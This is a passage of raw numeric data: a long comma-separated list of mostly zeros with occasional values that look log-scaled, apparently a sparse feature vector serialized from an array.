0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 3.044522437723423, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.0986122886681098, 0.0, 0.0, 0,\n 0.0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 3.4965075614664802, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 4.007333185232471, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4011973816621555, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 